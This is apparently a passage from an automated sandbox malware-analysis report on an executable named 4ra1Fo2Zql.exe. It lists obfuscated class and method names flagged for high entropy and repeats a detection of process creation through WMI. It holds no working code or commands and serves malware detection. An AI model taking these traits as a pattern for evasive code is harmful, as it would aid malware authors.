                              Source: 4ra1Fo2Zql.exe, t66nRMyv3aDp0Ot03wK.csHigh entropy of concatenated method names: 'iWmyCCwdCG', 'GQ3yGAnhiM', 'VLFy5ssZeC', 'efByiRF9kr', 'HGOyDbOj9w', 'PDlyy1yBoZ', 'S9hy7SSIUO', 'bZZyQaoeY1', 'kG6yhqYuG3', 'nH8yZnGKNx'
                              Source: 4ra1Fo2Zql.exe, BpNXecUGUR94nSRnStG.csHigh entropy of concatenated method names: 'method_0', 'method_1', 'K47', 'EgWUi9mp1U', 'vmethod_0', 'jKVUD8HYHV', 'xxScDUPKgIl', 'tIK1ZccuzbFceyii8qMg', 'NPTBTxcu6EYsdap0IcIy', 'GBkurVcuAmJYEqr3ASDH'
                              Source: 4ra1Fo2Zql.exe, kCPAeIE7dMhPOEPqNk.csHigh entropy of concatenated method names: 'IndexOf', 'Insert', 'RemoveAt', 'get_Item', 'set_Item', 'method_2', 'Add', 'Clear', 'Contains', 'WswqXrbpC'
                              Source: 4ra1Fo2Zql.exe, xQPLDIbFPja6FvsA8Kq.csHigh entropy of concatenated method names: 'SDZbfcct7k', 'DviblE5dUF', 'Ty0bRGMZQ8', 'UuCb8OwPJ1', 'Vkubkr8Gls', 'shmbbqn3wA', 'KrTb26DBWC', 'zktbm4k5Pd', 'II2bucsCHo', 'EHab9rRUVQ'
                              Source: 4ra1Fo2Zql.exe, DFqLFmswRgyPgqrFBMx.csHigh entropy of concatenated method names: 'F7csY2tFEI', 'PgUsOE7g6r', 'Q8psNNATrq', 'jdCst7G1v4', 'BkEsg1oCf4', 'MC30e1cTCRJaLaWSqwJ0', 'Sg1dNFcTGkXrL8dLcUkg', 'fLTrZlcT59juKGQPe5dD', 'brvtvKcTihNd1cLJJMgx', 'f3b2TCcTDUInmcVfLUZ0'
                              Source: 4ra1Fo2Zql.exe, oFr4nZGe6u1tpqFoDPF.csHigh entropy of concatenated method names: 'b8yGK9SNOU', 'thDG3XJbkd', 'AUhGn9QsLt', 'Rs2ugocFTkj9fn0Lj5qw', 'cY1t2bcF9yjo8oHpZDft', 'hlCcVmcFEa2yH1CHLh0v', 'O6OJrgcFqmS21mJdjV0d', 'cuRGs0T8bi', 'KwCGX6EjMU', 'bBmocXcFmmClUfsqOTpI'
                              Source: 4ra1Fo2Zql.exe, suSCHg3AQdKG0D3ACY3.csHigh entropy of concatenated method names: 'Y9mnjtANun', 'PGIncdTtAE', 'kBxnvlO6tC', 'hZTn1nlxbL', 'MYHnCWDUyM', 'ktvnG4ahir', 'bw4TLEcSD6ndpntXFGNY', 'QgrsrHcSyZIMNoHcNfV8', 'dXpqdZcS7WYZLneAtmvM', 'Sk4SbKcSQL0Q7d11sxBy'
                              Source: 4ra1Fo2Zql.exe, F7ZonGfRprCjvdLnpSY.csHigh entropy of concatenated method names: 'Close', 'qL6', 'DV6fkeQUh6', 'I6Mfb4agPt', 'Ygsf2A4k3C', 'Write', 'get_CanRead', 'get_CanSeek', 'get_CanWrite', 'get_Length'
                              Source: 4ra1Fo2Zql.exe, dYobUE5XQa9s2vONC6a.csHigh entropy of concatenated method names: 'SoL5FmUSuU', 'Ib2Un0cpEoRoyLWw4fR4', 'Ddnl55cpuIi0M067uuH6', 'BVdJFAcp9grTSCCVDv9b', 'TiwBVbcpTDjnuUtknm9b', 'gnpP6Gcpqbu5fF2Qvq8h', 'E94', 'P9X', 'vmethod_0', 'srUcC04vrHO'
                              Source: 4ra1Fo2Zql.exe, n3Bscv4bygT47v5nT1Y.csHigh entropy of concatenated method names: 'xF74qP8ysw', 'Jk74JH1nFf', 'UWS4Svo9RO', 'MUo7Aqcm07b61keqi7b2', 'ws5XpgcmacuZ0f4uhrST', 'thgJiFcm4tYWmZgfDpQb', 'GKU4mRtxmT', 'pvv4uOLHcB', 'mTE49Bv4n7', 'TUWhS0cmdW3fUZxXYibm'
                              Source: 4ra1Fo2Zql.exe, G60nIvD7EnbTUJB9AfS.csHigh entropy of concatenated method names: 'iVcDhqpOZt', 'qtSDZO8NiX', 'UrYDdYgoNP', 'YsB1GNclMu3IQM3jVRMw', 'M8OkQpclPawdtC5AES4J', 'NYhq3WclskWrPg2v08h1', 'GqXxp8clXRt4SpRGKN6o', 'I4lM6PclKM4D4Zont5K9', 'CCOSrDcl34P06kT6XvtY', 'HkI7LvclnKwNyRXwItoQ'
                              Source: 4ra1Fo2Zql.exe, lcgjMVDK38b57didclW.csHigh entropy of concatenated method names: 'x7IDn4pBXK', 'QyvDBMoOMH', 'S5HDFv78KB', 'SQYDpKPIfF', 'FWqDfZqlfP', 'p37Dl2dc2U', 'SfSqD6clAnx9BxjsnkSp', 'LPlhVxclzZ8i4heUuQxS', 'Wuqt2pcRjtLFUMqJfny0', 'l4JXOfcRcmu1qOHJnmRV'
                              Source: 4ra1Fo2Zql.exe, leScgRBAiEKqteybUbS.csHigh entropy of concatenated method names: 'JHcFjC4DeD', 'oW0FcXmOmk', 'Yd7', 'TGWFvFq0g1', 'v3EF1Yeq1B', 'qFSFCKYuWI', 'IfGFG7b4Q4', 'Cc3ApicHDrcdRaavHm78', 'yHwaR0cH5fGaMPZjnd5E', 'cmb2s6cHiQcMZYwn1I4Z'
                              Source: 4ra1Fo2Zql.exe, MGkHTiGwWqQBJJUxvV6.csHigh entropy of concatenated method names: 'VY8Gg25yPP', 'dwvG6OS8kb', 'K6UGALgHwy', 'M30GzWJhSK', 'BmO5jbilrU', 'hNJ5chM6x7', 'WYu5v1ovOu', 'QE6T9wcp4cEtaO6Qtcb6', 'uIPP3wcprLZ8aN0L2k3U', 'XeaeFXcpaNUPUKrdWx42'
                              Source: 4ra1Fo2Zql.exe, LElZEBiywA8CeEoRPwZ.csHigh entropy of concatenated method names: 'l7oiQvApa3', 'MnVihFX9wN', 'i5ms3ccf0xdn9BPsQBG3', 'wERRcacfak8vk6N1T7mB', 'OQfN1scf4e73Mm2BIbgD', 'D2qkGecfURwtBcTxS1ho', 'E9G7VPcfIjnNBoRrIjQU', 'FO59PIcfo7bBlfUb6YjE', 'rijri8cfsbqfBjaVoBDt', 'pTXPyZcfXTREIZvdi7VN'
                              Source: 4ra1Fo2Zql.exe, CCvJFOnmi8MqYguZx3Z.csHigh entropy of concatenated method names: 'udZn9vT5qJ', 'jlgnEiPO6X', 'ChRnT98afM', 'gh7nqJ3WuC', 'lMTnJKk1lU', 'nuvnS8JjVf', 'pZHnVqu43n', 'cYqnHJVEir', 'TtEnwkqyjk', 'Y7FnxZNlIZ'
                              Source: 4ra1Fo2Zql.exe, dogL2scATqm5CBE3gnJ.csHigh entropy of concatenated method names: 'KZ3', 'fW4', 'imethod_0', 'U7v', 'ENCcDcPkcI4', 'vnWcCcgqcIs', 'Lr6Qgbc3j9rrXhaBEvwL', 'auv78nc3ctDQujKPVum4', 'ulTuGuc3vlemnNocrOyf', 'odoFhUc31pP46ndk8yHa'
                              Source: 4ra1Fo2Zql.exe, uJHsE8GEU6s7g1KM1q6.csHigh entropy of concatenated method names: 'MrmGVYigSG', 'TrWPCpcpyZGRucJWqeeX', 'xIONV8cpiNiavrY8XXwq', 'GDeCHgcpDOBAldeRKbic', 'AY5jaYcp77M0A9c6rjJr', 'U1J', 'P9X', 'zhOcCeEcBnE', 'cGmcCLkrS23', 'pV6cDiMXngk'
                              Source: 4ra1Fo2Zql.exe, gNhdDOnFZ08FxLXBCfs.csHigh entropy of concatenated method names: 'DB4', 'method_0', 'method_1', 'method_2', 'method_3', 'method_4', 'method_5', 'A47', 'fC4', 'aK3'
                              Source: 4ra1Fo2Zql.exe, KjvT0dMs3YQguG4p87v.csHigh entropy of concatenated method names: 'ylpMM5qPkC', 'qqdMPUsJdl', 'EjkMKvdQsQ', 'lpOM353gUp', 'mKVMnpkyj8', 'Mp3eH2cqGNrV0g3DgXTh', 'z2tGGVcq56bt32Cjx5pA', 'vdm2rGcqiQFoDdQjtPNk', 'TpxEwbcqDpDSUfIdS5Z1', 'oa2UPscqyKmnCb4sqRs0'
                              Source: 4ra1Fo2Zql.exe, zyIMZ4K1lmP8y7jb09Q.csHigh entropy of concatenated method names: 'method_0', 'YU8', 'method_1', 'method_2', 'QJdKGXRcpw', 'Write', 'rIwK5lmbou', 'g4hKiSDuF2', 'Flush', 'vl7'
                              Source: 4ra1Fo2Zql.exe, eu4Juytj8syog843X6R.csHigh entropy of concatenated method names: 'yLUtCCC8a8', 'p9btGRsa8e', 'yVFb7lc6jLpmZovYws7W', 'iZqYqrc6cFaSlC6uSNMH', 'OKmkMlc6vGUHCncAqKvA', 'tHh40pc61jWXSNJp0ooC', 'paXrYjc6Chb1iJttPLk4', 'KUPtv6sVMk', 'jybJfRcgg0Zfj5hcS3W4', 'Siwy33cg6CcDrrgwCROZ'
                              Source: 4ra1Fo2Zql.exe, dY24pPC495cqBg8hpMO.csHigh entropy of concatenated method names: 'KZ3', 'imethod_0', 'L3I', 'XmFcDvrRayT', 'vnWcCcgqcIs', 'UPHpXfcBUKb06vixJdu7', 'yyl0VocBIoBFdf6knp3B', 'Ah5UjHcBoYrm3lTXrMpQ', 'sZXOBDcBsJ6109QEOr5V', 'G44b6LcBXmB2nFn0UhjI'
                              Source: 4ra1Fo2Zql.exe, OT2fhhbTIUTxcPNvcmZ.csHigh entropy of concatenated method names: 'W36cDXVLRBc', 'XN1bJlTGJ8', 'g0DbS9HLhw', 'dK4bV0w13s', 'UvGYVDcYuOmpnWUFmB09', 'gl4aT0cY9gRSJoBwANFo', 'oW3jNucYERZsm88XnZA4', 'QacR5GcYTmi4H6pAnxwO', 'shV66mcYqEpmNcrtKu3w', 'o58blwcYJYbODoNoyxLC'
                              Source: 4ra1Fo2Zql.exe, DKKIfSNFCCxQDUka87n.csHigh entropy of concatenated method names: 'c9rNfXJGhS', 'zLqNlR4UcA', 'vIvNRcCXO3', 'OMoN8IXpAn', 'Dispose', 'VFDVVrcglepHk4ZOJd4a', 'k7fgITcgpEbXjZv9OeiA', 'jcTyyPcgf5IepNc3svPM', 'X6Fy6UcgR6nBQgyadIxp', 'aq9ANRcg8xAxUXxtD70u'
                              Source: 4ra1Fo2Zql.exe, GcbayIGlb8oSTZlMk62.csHigh entropy of concatenated method names: 'l29', 'P9X', 'vmethod_0', 'DPScCQZ088T', 'nGbG8KfZh1', 'imethod_0', 'JgqvmucFSyWEAbWGop81', 'gcUbu2cFVTlXvtpxijfv', 'NpyYpEcFHBMXofmHq43K', 'rej3HJcFw1nasPbGgiSW'
                              Source: 4ra1Fo2Zql.exe, fQanusvHeXysFOfABrc.csHigh entropy of concatenated method names: 'QMN1ijTwVU', 'TVxlwqc36K0M7hrK4UYC', 'HjftWLc3Ar7rmvQaj8LO', 'B81gJwc3zHpKbAaXAQXD', 'csoVpecnjpUkhQKtSBHt', 'W99M6mc3tn7HTsfd6Kmg', 'CP0Wycc3gHH8SjmjjHuh', 'D3UbJ9cncYWpe0hjghLi', 'iSXuYXcnvhgXt3WuvMjK', 'BoP1jqSi1v'
                              Source: 4ra1Fo2Zql.exe, Pu3DSwC2RD7KEiL4vfo.csHigh entropy of concatenated method names: 'GXVC647Cuu', 'SDJE2ecFyHJfbTNcG4sd', 'WttO5JcF7KwtEVQdj3jC', 'bxmQcwcFihAf2rh7FuTJ', 'CsfR4TcFDYwLvdtoLCsM', 'rKfSxGcFd9iZTlQFsVJ1', 'aMLDX0cFh2EiM4NjARRs', 'YWOD0RcFZtX4FybGn9L6', 'oqP2njcFWSusulSfCymm', 'r7GG5q0gv5'
                              Source: 4ra1Fo2Zql.exe, TJhJRrlH1sgNhHgKGUf.csHigh entropy of concatenated method names: 'iX3aHLcxetRwaQ4NtLAX', 'bP4PeBcxLU7dUGaCFYIj', 'wns0gocxrMAaGAhfViMy', 'tL4lxwmbHn', 'Mh9', 'method_0', 'cWRlYYPAox', 'iTUlOB38RA', 'sJ3lNtuZPT', 'u9Ultl3tYr'
                              Source: 4ra1Fo2Zql.exe, iXuyu34YOBnWV6rGi7U.csHigh entropy of concatenated method names: 'm1I', 'G4q', 'w29', 'oX8cDZ3EnFt', 'ChqcCqi2EH7', 'GiPQNGcm3AXAqYpVXRNg', 'nTrEXncmneWdfuNNirkb', 'k3MWV9cmBBsM83yofyZY', 'OHK6PYcmFiUygrtoVKiX', 'z8mglgcmp79VQdqMtZkp'
                              Source: 4ra1Fo2Zql.exe, hgWe380VnaRJmLpIeVr.csHigh entropy of concatenated method names: 'wq9cDLEuKKJ', 'GYi0w2HSb5', 'V9IcDrmyrDW', 'I6NKxRcu8rEAQpWRoX6I', 'fFLEKFcukJqqsCu6xGRk', 'smfAWYcul7LtxX8uw8VL', 'NAek3CcuRgoHvmQ9rPwG', 'TUsddNcubdvGRPpXDb5M', 'aZpesQcu24MonfdogW2K', 'vcXxDAcumIWLhHUjmAqL'
                              Source: 4ra1Fo2Zql.exe, Nx7HEtWQNP1A41ZuSaw.csHigh entropy of concatenated method names: 'Dispose', 'IUZWZ5evf7', 'paQWdpGF3Y', 'U5MWWQJonV', 'b1NnO4cb7dYVGLkJwiXI', 'GmLmNbcbQNcyJY0WJWJp', 'ziu3t8cbhl5qOHVF2KDx', 'TrgHSvcbZTf4f8Osm6FP', 'zeeiIBcbda1sFVV4YHZJ'
                              Source: 4ra1Fo2Zql.exe, Qon7Cv3x2nEwjN7u77h.csHigh entropy of concatenated method names: 'XkV3OrRBsm', 'OSS3NTra2J', 'LNH3t3OJkG', 'GEC3gaqtF6', 'sVR36fRRkj', 'nrwuftcSvUmF3lswSYBF', 'dtGVf7cSjOm5OAI7SjrA', 'THxVGncScDvl8B9Uqy1L', 'gTvUG8cS1fUallXMFFNh', 'd8kwg6cSCIYvfGGtpwMt'
                              Source: 4ra1Fo2Zql.exe, DB9M1HydFgb7nonCfFL.csHigh entropy of concatenated method names: 'q76', 'method_0', 'p9e', 'hkB', 'method_1', 'method_2', 'OofKgucREhv9J3wt4878', 'zT4MFrcRT76uBt4SVKm5', 'Fhj4O8cRqjvgcM369q6X', 'gdqyeumpF3'
                              Source: 4ra1Fo2Zql.exe, VPXbnP0djxnfTVe42Tm.csHigh entropy of concatenated method names: 'CTP00GRtFj', 'VpIwBWcu1Zrytnw7cKPa', 'RjwRQucuCs8FtjKy9QeQ', 'QyvG1ucucVr7I7NaVnDf', 'DNeFTqcuvoj1wAESO2y4', 'e26ENZcuGY7nTHmlye47', 'UAi0egA9SF', 'd2BKVLcmtEbHBwYsj0pb', 'FBPqATcmOwdpe8Lflf9D', 'RL45ErcmNZsrihK2vqBA'
                              Source: 4ra1Fo2Zql.exe, aVe74o1HUFWPtYIyrYU.csHigh entropy of concatenated method names: 'C23C1qPgYf', 'bhSCCuFmUD', 'QCBCGCklN7', 'JdV4rMcB5LCskngOqe8S', 'E6pTpBcBiE7RC7IffyBp', 'cTBxNicBCUdnEXy1mUgg', 'CrEnMQcBGqRUr2iGbUnn', 'sYACQEQA3Z', 'qt5FbLcBQixWBuWex1Vw', 'a74YJ0cBy986HBqNfB0L'
                              Source: 4ra1Fo2Zql.exe, IV9cyv2FFYTATxIxBVw.csHigh entropy of concatenated method names: 'KW62fPltq3', 'HlO2lfHeXO', 'LJa2RQZRci', 'M4i28OP73l', 'lxj2krDQ71', 'jFL2bp0Jfj', 'KpF22e23g9', 'qZb2mbn97G', 'wpu2uGgihJ', 'X2i29bbE74'
                              Source: 4ra1Fo2Zql.exe, HUrRKiDIw6cvRFMn0mo.csHigh entropy of concatenated method names: 'psqDsGXrwv', 'c5iv82clJRiDt2YT0oc9', 'g6xDiGclSUSJo9BdBA9R', 'Ge6iBYclVCoaZJ40jxxh', 'bFdP82clHTgbWI8LLoiq', 'AZINJuclwMJvWQAA54Mr', 'OO4kgYclTb9e3Zcl5Gqm', 'kv98puclqmD4nukQs5k4', 'iPGyQVclxtSW8qVZ9iDg'
                              Source: 4ra1Fo2Zql.exe, yhMBD4s7wNk7qAsjsr9.csHigh entropy of concatenated method names: 'hgysFExdvU', 'kipshBl2x0', 'AbHsZUXL8L', 'cB5sdUO3NM', 'VvHsWBr1MC', 'mLrsewh37m', 'OmNsLqEVqN', 'eeTsrGXv0g', 'sD1saKL0Jl', 'B9ts4ZG1V2'
                              Source: 4ra1Fo2Zql.exe, YSnMSvPQ1Ormf4YLlJ8.csHigh entropy of concatenated method names: 'UGrPZdWIlT', 'k9JPdGmR6Y', 'cm3PWGGLKF', 'tYtPef8wjm', 'NYnPLIyX2F', 'hdDl96cqMZAWjF7NfOFx', 'yAU8yfcqs2aNHgteotZF', 'd3B4p2cqXSfiu2X4NBYE', 'VoMofKcqPyI4gGtZCBjO', 'bBBxQlcqKIDXD9PlEawa'
                              Source: 4ra1Fo2Zql.exe, etFV6Q8RsMPCOytDGjt.csHigh entropy of concatenated method names: 'Dispose', 'MoveNext', 'get_Current', 'Reset', 'get_Current', 'GetEnumerator', 'GetEnumerator', 'FOMflhcxqLXS7Qhwfqe7', 'uVc5IxcxEYk0kJW4GNx7', 'IpEgUScxTP5pO7EiNX2t'
                              Source: 4ra1Fo2Zql.exe, tUEkmFiuw8NuO4CGsZ8.csHigh entropy of concatenated method names: 'EItiNZnAG4', 'ykoitiAEZs', 'QFgU9MclhsYYTH8fk5Sp', 'hcyqxBcl7ggyQiw8iTI9', 'WHIgH0clQm7ZFFENLO3P', 'L7WUqwclZyEiFgtGP1Hu', 'AvPiE5YN3E', 'DD4iTY0TLF', 'wyXiq87WPy', 'TsDiJLTKIf'
                              Source: 4ra1Fo2Zql.exe, TR8Tju5ug4lftAofk1l.csHigh entropy of concatenated method names: 'R5Q5NA9JYt', 'CPb5tlT6XV', 'RQI5gNj99V', 'jD566icfykUmGTdvmnFA', 'bIJPDucf7A5qI1o0h7F5', 'mbY0Fqcfi8HAqSRjqkUv', 'CsBAgecfDndY9obHYUsR', 'o0G5E2L24f', 'O6g5TA09TH', 'gac5q7QflY'
                              Source: 4ra1Fo2Zql.exe, sCysD0GysTxMGnuL2OO.csHigh entropy of concatenated method names: 'Rpx', 'KZ3', 'imethod_0', 'vmethod_0', 'RZNcDGGny9k', 'vnWcCcgqcIs', 'jg8bFFcF0Iwwx2Ccin00', 'IAaFM6cFU27yHW2gulhu', 'sFXwANcFINTNqA3dEvag', 'l5H0oMcFoi5ioVTMIZZo'
                              Source: 4ra1Fo2Zql.exe, nDbLvo3qVLKVJF7sP1m.csHigh entropy of concatenated method names: 'pGZ3SkMnhw', 'Ise3VnKgj9', 'q8n3HDL2k7', 'yFHfgjcJNcDIymf9fpcW', 'j2UJi3cJYXKkQKI6FgPs', 'XSb8OUcJOg6MxgXAtm0b', 'xJj7umcJteC1YhauhqqQ', 'hEiV5FcJghVS2cgklb29', 'sTsexFcJ6clQISHo9k86', 'MA4iSecJARrFTqtccJ3r'
                              Source: 4ra1Fo2Zql.exe, y2cQVhbyso8ZBUkcRvA.csHigh entropy of concatenated method names: 'FgKbXwtqJU', 'trFGJPcY3bpmOwHJA5Ao', 'D9SFPUcYnCBEjnrkBIR4', 'hSwVuccYPVa7d5eaxYWZ', 'wG5vhmcYK2jJNLsqepfl', 'PhwHpDcYB1NQBKRowYCm', 'IPy', 'method_0', 'method_1', 'method_2'
                              Source: 4ra1Fo2Zql.exe, Hi2iCjPFwOK39Y9KPHC.csHigh entropy of concatenated method names: 'method_0', 'jJIPfPp4yl', 'eQBPlqwxwg', 'cvjPRreb8A', 'OWDP8IGZsl', 'G7kPkVUY4F', 'Ot5Pb0OtiT', 'wkjK0XcqkTZIU7I6tZYK', 'PuW6JncqRJWU2ULcaefh', 'qUgY6Jcq829jaO7YkxmM'
                              Source: 4ra1Fo2Zql.exe, vOSyaTvGSDci05XbLCs.csHigh entropy of concatenated method names: 'FfTvieBunt', 'OaRvDmy10u', 'qWAvync7nu', 'Hvfv7NlMmb', 'xXM5FMc3WSVPLIi2b1jF', 'jcnBdnc3ZAfnXQenQcey', 'hjC7aLc3dZLrx7Bx3sXa', 'OPoOBoc3eGrZIsbRu43B', 'FC1qI9c3LtlP4QNZtcAY', 'mMDcgvc3riCek25bfA6V'
                              Source: 4ra1Fo2Zql.exe, KG8EEGpUc9XH9hEnkVj.csHigh entropy of concatenated method names: 'Fi1fds1NWo', 'N5eMsmcwvPZb7YVXXwOe', 'mcADgqcw1ddyWnmgCZ4o', 'kt5', 'uUIpoYuMgx', 'ReadByte', 'get_CanRead', 'get_CanSeek', 'get_CanWrite', 'Suz'
                              Source: 4ra1Fo2Zql.exe, FkLS7gDLVM8h3jrb8Jh.csHigh entropy of concatenated method names: 'Ga1D0C5FLK', 'UiH0FOcl9fcl86h6l18A', 'pqS4Zgclm4GihxYYRC72', 'QiWnUIcluy20ZJqha4iv', 'vQqDaSg7UD', 'TbjUUkclR7anoTD1prwG', 'fHIoqBcl8LpvYuLNwSUD', 'CwOgvxclkTPvRti6pd2c', 'AmsDEMclfY7Id1DUMQdi', 'ALG8VbclldV1yExKXPpt'
                              Source: 4ra1Fo2Zql.exe, wnVArrWogH7KjABKws0.csHigh entropy of concatenated method names: 'wNd4ZUfLYp', 'e3P4ds6WGo', 'vQjqw0c2OhGRhLtFYJQA', 'sBVBMjc2x8mubneffZIu', 'fFVZCqc2YLgRvcU9vRel', 'tBhwmwc2Nf4TMYTLifPk', 'MRf44BhLgY', 'fnGCTPc2gvYPrPFoKNf2', 'M2mdX7c26wWJSn3kHbiG', 'YZkaJZc2AXOhWgwtP3XV'
                              Source: 4ra1Fo2Zql.exe, XrgwotBTm4DxLoN6ZYc.csHigh entropy of concatenated method names: 'vVQBJaLQHB', 'DF1BSLqiu1', 'iXOBVBjpVX', 'qKwBH8AqjC', 'KSiBwRKKFw', 'N5iNiQcVtFJG68Z1oPhT', 'xyGU8WcVgbIQJDEaRfjW', 'wbiXgncV6XGL7Bl25ID1', 'iLudcYcVOUy51wDRfCZH', 'XivmticVNMV1GV29jUs9'
                              Source: 4ra1Fo2Zql.exe, UcNwSr0ETGRuQRnTxSt.csHigh entropy of concatenated method names: 'iGV0qqHH4x', 'oKV0JdSsAg', 'O130SbJ4VT', 'NoQZUWcun58loggP1feT', 'fSQPGScuKr2illI3LRYb', 'LObjWGcu3I34wwpV33aF', 'Rt7qJLcuBVWXQxuNjbAO', 'Ys6GyPcuF53EhO72R6wo', 'g2EALIcupLoGi64px8Ed'
                              Source: 4ra1Fo2Zql.exe, vMm4SAXEFg3QQNHt6xw.csHigh entropy of concatenated method names: 'a99', 'yzL', 'method_0', 'method_1', 'x77', 'Mh4XqT4DCI', 'oWkXJBLx8q', 'Dispose', 'D31', 'wNK'
                              Source: 4ra1Fo2Zql.exe, QcIWbXfHqXy4gM2THdQ.csHigh entropy of concatenated method names: 'qrmfxjhNBP', 'k6r', 'ueK', 'QH3', 'GsnfYctrJq', 'Flush', 'aGUfOpaF4T', 'vuBfNF9HP1', 'Write', 'yYKfttmARc'
                              Source: 4ra1Fo2Zql.exe, yKLFTS2tKygjw4mmtKv.csHigh entropy of concatenated method names: 'yWl26oVfAb', 'Iuj2AEOcdl', 'Clu2zAkI2K', 'UPdmjkvvPx', 'sNLmcxvVc4', 'CQJmvQlZUt', 'Nhvm1gep81', 'rvwmCbrnaH', 'acGmGPl8Uy', 'ckim5F1vcb'
                              Source: 4ra1Fo2Zql.exe, eyoEW5UcN4RK4Gyefrx.csHigh entropy of concatenated method names: 'rC9', 'method_0', 'GtycD4vw5jk', 'PDIcD0lge8N', 'WrGHPQcuwKEZvvUdJjh8', 'KLTaHccuxavdDlNIRMaR', 'JXnN7ncuYdmBv6m6Zcgg', 'UqFbaNcuO8eUALDaT4xI', 'ix0a8GcuNCRVH4G9MBA5', 'KOilHocutmn2h0eYTW5D'
                              Source: 4ra1Fo2Zql.exe, m6OFPnDm24BVmsEjggm.csHigh entropy of concatenated method names: 'P9X', 'vUrcDhfCWe1', 'imethod_0', 'hqGD9axyHg', 'DhP6qYcRiFHTOQxsRjIS', 'oOFPqpcRD3uZyPqxwB7e', 'cyDxXPcRyE2BB1GA1t0r', 'SJUrMXcR7AcTv9lK32lN', 'eXvXjMcRQJ5aIK4i43J8'
                              Source: 4ra1Fo2Zql.exe, yjf4BF43BlrZo9v9RXe.csHigh entropy of concatenated method names: 'WJ848o4Ke7', 'wXFQYMcmQOWJNbLp4J6P', 'J9shwncmy0vT3mpCcvtV', 'FUq118cm7uNitjusc3ke', 'B4Ngp5cmhgHyq3u351b6', 'gJK4BkONSr', 'mOH4FAcQgp', 'kUA4p6Ii2b', 'GNe7l8cmGZpm7vuSoWpk', 'L8mIhdcm5LO2NQrTJ6Mq'
                              Source: 4ra1Fo2Zql.exe, t08FVnvFBoPDGZMgM8T.csHigh entropy of concatenated method names: 'I1ZvuExKeI', 'nh9v98EVS5', 'KqqKZ3c38qjKKCABTk8s', 'J654LFc3kRx7mWGsgEVL', 'wA7vJ8T36J', 'f81dWrc3u5u5iiARXe5G', 'AvSCDjc39BDDTPN0Jq7L', 'SE5CEqc32HohDy1hc1Xc', 'NDFr7vc3mZbLpUlw3ngs', 'jk5klWc3EfovCUTPy6tH'
                              Source: 4ra1Fo2Zql.exe, d1UH2ei4FhydddUy7fo.csHigh entropy of concatenated method names: 'AXRi3bPESM', 'MfomDQcfJhUpaxBxbA4E', 'my2RJdcfSexVt6wS74a6', 'mrFioJcfTkllGdVrU9OR', 'dHSVp3cfqugyfRROhkwm', 'wsuC8wcfVxO4kT5vki9c', 'YPexflcfH642ey3du4RV', 'udSiUIrJiR', 'Xp1iIjb3Tu', 'Al6ior499S'
                              Source: 4ra1Fo2Zql.exe, VYVXbHUesxlnOWEIBWV.csHigh entropy of concatenated method names: 'n9saE3c9BYr8w7v6XOar', 'Q3KV78c9FsUQBHEaj3En', 'ewxoMpc9pbZOcS9j9Vkw', 'ReEyatc93TLReKwn9LYU', 'gDeqCMc9niNhTUhviG4X', 'method_0', 'method_1', 'kryUrIYEL9', 'yGoUaXi60L', 'PBBU4iMZj1'
                              Source: 4ra1Fo2Zql.exe, DDFQKBFg5J9JxUEKt0v.csHigh entropy of concatenated method names: 'C5rFAoEwjg', 'bsIFzpeOut', 'AUgpj5ZqlP', 'i9Ppc4XOwj', 'hhZpv4MmOY', 'MG3p17aY9T', 'Rpx', 'method_4', 'f6W', 'uL1'
                              Source: 4ra1Fo2Zql.exe, GGkOJOz9cBhq6YIyTj.csHigh entropy of concatenated method names: 'RFpcckVdhe', 'L1Fc129e92', 'MJAcCDCPlC', 'WDUcGDBein', 'WiSc5GRQck', 'K4ociM5yXV', 'Hjgcyc8xsb', 'R7clsucKixPxAoJZZCbH', 'jnkvoTcKDMexp7vNsoAJ', 'qmKBWDcKyG38srF9unDn'
                              Source: 4ra1Fo2Zql.exe, M1aS8QKuM4yePZFygnv.csHigh entropy of concatenated method names: 'U3TK6hqSp1', 'V3oKzmGBLS', 'ttGKEpZZMs', 'emeKT22FmE', 'RYJKq8Erac', 'O8nKJmMM46', 'HFqKS0s5WR', 'TjPKVZZrJk', 'L0uKHnmuFA', 'EVyKwl4p22'
                              Source: 4ra1Fo2Zql.exe, bVjfStMY3rChacMXOBv.csHigh entropy of concatenated method names: 'tfmMNwj4Gu', 'yLlMtNrxkb', 'rGXMghWYdy', 'gG1oxJcq4Phu9vi0bly7', 'upLj6McqrBNgWbC8pPEg', 'OG6RE4cqaF60viQXs5V9', 'A5HI7Dcq073xmHkqWE83', 'sfOYoWcqU7H0fYfSJ1Pi', 'no4UNUcqIUtVTAQbDBJT'

                              Persistence and Installation Behavior

                              barindex
                              Creates processes via WMI
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
